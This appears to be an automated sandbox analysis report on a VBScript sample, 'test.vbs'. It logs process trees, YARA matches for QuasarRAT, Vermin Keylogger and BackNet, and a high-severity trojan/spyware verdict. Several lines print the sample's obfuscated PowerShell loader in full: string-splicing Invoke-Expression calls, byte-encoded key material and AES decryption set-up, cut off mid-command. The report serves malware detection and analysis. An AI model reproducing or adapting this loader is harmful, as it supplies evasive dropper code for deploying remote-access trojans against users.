                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "& {function IrUjV([byte[]]$f9mpX) {Invoke-Expression -Verbose -Debug -InformationAction Ignore 'zZO$zZOSzZOfzZOYzZOszZO9zZO=zZO[zZOSzZOyzZOszZOtzZOezZOmzZO.zZOTzZOezZOxzZOtzZO.zZOEzZOnzZOczZOozZOdzZOizZOnzZOgzZO]zZO:zZO:zZOUzZOTzZOFzZO8zZO.zZOGzZOezZOtzZOSzZOtzZOrzZOizZOnzZOgzZO(zZO$zZOfzZO9zZOmzZOpzZOXzZO)zZO'.Replace('zZO', ''); return $SfYs9; } function SsYTA([byte[]]$MyDKV) {Invoke-Expression -WarningAction Inquire -Verbose 'RzW$RzWGRzWwRzW1RzWMRzWHRzW=RzW[RzWBRzWiRzWtRzWCRzWoRzWnRzWvRzWeRzWrRzWtRzWeRzWrRzW]RzW:RzW:RzWTRzWoRzWIRzWnRzWtRzW3RzW2RzW(RzW$RzWMRzWyRzWDRzWKRzWVRzW,RzW0RzW)RzW;RzW'.Replace('RzW', ''); return $Gw1MH; } $MXyPq = IrUjV(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxMg = IrUjV(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gYqop = IrUjV(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $QR3m4 = IrUjV(0x4a, 0x6d, 106, 53, 121); $Q21ag = IrUjV(0x67, 0x69, 69, 99, 67); $u2Okr = SsYTA(0x00, 0, 0, 0x00); $dXs3R = $true; $gnS0E = $null; function juypb($gsleS) {Invoke-Expression -Debug -WarningAction Inquire 'Fs5$Fs5wFs5GFs52Fs5gFs5lFs5=Fs5[Fs5SFs5yFs5sFs5tFs5eFs5mFs5.Fs5SFs5eFs5cFs5uFs5rFs5iFs5tFs5yFs5.Fs5CFs5rFs5yFs5pFs5tFs5oFs5gFs5rFs5aFs5pFs5hFs5yFs5.Fs5AFs5eFs5sFs5]Fs5:Fs5:Fs5CFs5rFs5eFs5aFs5tFs5eFs5(Fs5)Fs5'.Replace('Fs5', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose 'hta$htawhtaGhta2htaghtalhta.htaMhtaohtadhtaehta=hta[htaShtayhtashtathtaehtamhta.htaShtaehtachtauhtarhtaihtathtayhta.htaChtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htaChtaihtaphtahhtaehtarhtaMhtaohtadhtaehta]hta:hta:htaChtaBhtaChta'.Replace('hta', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire 'RLY$RLYwRLYGRLY2RLYgRLYlRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLY=RLY[RLYSRLYyRLYsRLYtRLYeRLYmRLY.RLYSRLYeRLYcRLYuRLYrRLYiRLYtRLYyRLY.RLYCRLYrRLYyRLYpRLYtRLYoRLYgRLYrRLYaRLYpRLYhRLYyRLY.RLYPRLYaRLYdRLYdRLYiRLYnRLYgRLYMRLYoRLYdRLYeRLY]RLY:RLY:RLYPRLYKRLYCRLYSRLY7RLY'.Replace('RLY', ''); Invoke-Expression -WarningAction Inquire -Verbose 'MnG$MnGwMnGGMnG2MnGgMnGlMnG.MnGKMnGeMnGyMnG=MnG[MnGSMnGyMnGsMnGtMnGeMnGmMnG.MnGCMnGoMnGnMnGvMnGeMnGrMnGtMnG]MnG:MnG:MnGFMnGrMnGoMnGmMnGBMnGaMnGsMnGeMnG6MnG4MnGSMnGtMnGrMnGiMnGnMnGgMnG(MnG$MnGMMnGXMnGyMnGPMnGqMnG)MnG'.Replace('MnG', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire 'BNK$BNKwBNKGBNK2BNKgBNKlBNK.BNKIBNKVBNK=BNK[BNKSBNKyBNKsBNKtBNKeBNKmBNK.BNKCBNKoBNKnBNKvBNKeBNKrBNKtBNK]BNK:BNK:BNKFBNKrBNKoBNKmBNKBBNKaBNKsBNKeBNK6BNK4BNKSBNKtBNKrBNKiBNKnBNKgBNK(BNK$BNKlJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C023A5465_2_00007FF7C023A546
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C023B6F25_2_00007FF7C023B6F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0231E066_2_00007FF7C0231E06
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0232BB26_2_00007FF7C0232BB2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C02F401D6_2_00007FF7C02F401D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0233A106_2_00007FF7C0233A10
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C02501608_2_00007FF7C0250160
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C025A2988_2_00007FF7C025A298
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0254BEC8_2_00007FF7C0254BEC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7C0312C408_2_00007FF7C0312C40
                      Source: test.vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5035
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5003
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4833
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4325
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5035Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4833Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4325Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5003Jump to behavior
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.2255f9c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.22557635510.2.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.2255f9c0000.7.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 8.2.powershell.exe.22557635510.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000008.00000002.2797885450.000002255F9C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_BackNet_Nov18_1 date = 2018-11-02, hash1 = 4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc, author = Florian Roth, description = Detects BackNet samples, reference = https://github.com/valsov/BackNet
                      Source: Process Memory Space: powershell.exe PID: 7252, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 6104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
                      Source: 8.2.powershell.exe.2255fa80000.8.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteInteger
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteBytes
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.WriteMessage
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadWriter.csSuspicious method names: .PayloadWriter.Dispose
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadInteger
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadBytes
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.ReadMessage
                      Source: 8.2.powershell.exe.225576fb380.0.raw.unpack, PayloadReader.csSuspicious method names: .PayloadReader.Dispose
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@21/14@3/4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1528:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\615456d8-1d6d-425c-ab75-75d0b24fbc45
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwtxwxrf.ode.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\test.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "& {function iT93g([byte[]]$E3OXu) {Invoke-Expression -Debug -Verbose 'H6M$H6MwH6MhH6MBH6M3H6M2H6M=H6M[H6MSH6MyH6MsH6MtH6MeH6MmH6M.H6MTH6MeH6MxH6MtH6M.H6MEH6MnH6McH6MoH6MdH6MiH6MnH6MgH6M]H6M:H6M:H6MUH6MTH6MFH6M8H6M.H6MGH6MeH6MtH6MSH6MtH6MrH6MiH6MnH6MgH6M(H6M$H6MEH6M3H6MOH6MXH6MuH6M)H6M'.Replace('H6M', ''); return $whB32; } function tiw6l([byte[]]$ZUv5N) {Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore 'DTC$DTCqDTCKDTCaDTCGDTCiDTC=DTC[DTCBDTCiDTCtDTCCDTCoDTCnDTCvDTCeDTCrDTCtDTCeDTCrDTC]DTC:DTC:DTCTDTCoDTCIDTCnDTCtDTC3DTC2DTC(DTC$DTCZDTCUDTCvDTC5DTCNDTC,DTC0DTC)DTC;DTC'.Replace('DTC', ''); return $qKaGi; } $H2oUx = iT93g(0x74<#AgF8G#>,0x52<#sotVh#>,0x6B<#IJTfo#>,0x58<#aq0EZ#>,0x43<#lRyb0#>,0x36<#LDjCA#>,0x6A<#DRhTQ#>,0x2B<#Nxos5#>,0x34<#AjnVW#>,0x5A<#vkssP#>,0x6F<#Nr7dJ#>,0x52<#lsoI1#>,0x59<#pErVd#>,0x62<#tlAPZ#>,0x79<#kBIJZ#>,0x47<#HncF5#>,0x70<#hU1xu#>,0x6F<#TUEJh#>,0x4D<#cJg0H#>,0x45<#w2R2e#>,0x75<#QkdTi#>,0x6B<#LjyD9#>,0x6B<#EPiNN#>,0x43<#YN4lF#>,0x59<#bh0r2#>,0x46<#bfRBe#>,0x42<#OWjkm#>,0x51<#D0iPg#>,0x34<#pgAJc#>,0x2F<#OkTmn#>,0x46<#k7qw7#>,0x79<#ntwbA#>,0x64<#lRwjs#>,0x34<#lp8kK#>,0x58<#gppFR#>,0x4F<#zhqOk#>,0x4B<#xLpYw#>,0x4E<#Qpxm0#>,0x58<#QDHOx#>,0x78<#bubbt#>,0x2B<#gmscA#>,0x45<#CSle7#>,0x67<#LDi0E#>,0x3D<#bmXwZ#>); $qBAgs = iT93g(0x4E<#C2Vu0#>,0x47<#diaRv#>,0x30<#MGPf7#>,0x52<#QdMXt#>,0x63<#AESom#>,0x50<#NfQKQ#>,0x37<#uWoBq#>,0x49<#mQ8mb#>,0x36<#Z2Tts#>,0x7A<#GxC3u#>,0x75<#DZACY#>,0x45<#yjqHj#>,0x65<#DRQB2#>,0x65<#tbNzN#>,0x6F<#Cek6P#>,0x32<#Hvj6e#>,0x46<#YcXZM#>,0x6F<#YWlmr#>,0x77<#Ik0CX#>,0x72<#KlS1z#>,0x34<#jkNpr#>,0x51<#dzExQ#>,0x3D<#KAunG#>,0x3D<#f40yY#>); $ZXcf8 = iT93g(0x53<#b0lHD#>,0x6F<#YnhiC#>,0x66<#bdsGx#>,0x74<#tOssn#>,0x77<#hRyWf#>,0x61<#I0N5w#>,0x72<#PudcT#>,0x65<#r8GlO#>,0x5C<#wRgut#>,0x4D<#lRnzO#>,0x69<#SMHLu#>,0x63<#LCPm3#>,0x72<#galvu#>,0x6F<#oAPw7#>,0x73<#uIGer#>,0x6F<#SvDmv#>,0x66<#tMXra#>,0x74<#EnRsF#>,0x5C<#qtdsl#>,0x57<#aquA7#>,0x69<#lC02U#>,0x6E<#LGneX#>,0x64<#X9m0B#>,0x6F<#VC3Vo#>,0x77<#HtgrI#>,0x73<#IoY3L#>); $hBkVc = iT93g(0x73<#jBCoD#>,0x31<#rVfXN#>,0x55<#zAwUn#>,0x6E<#qHnrL#>,0x62<#YwZWy#>); $B8Dta = tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = 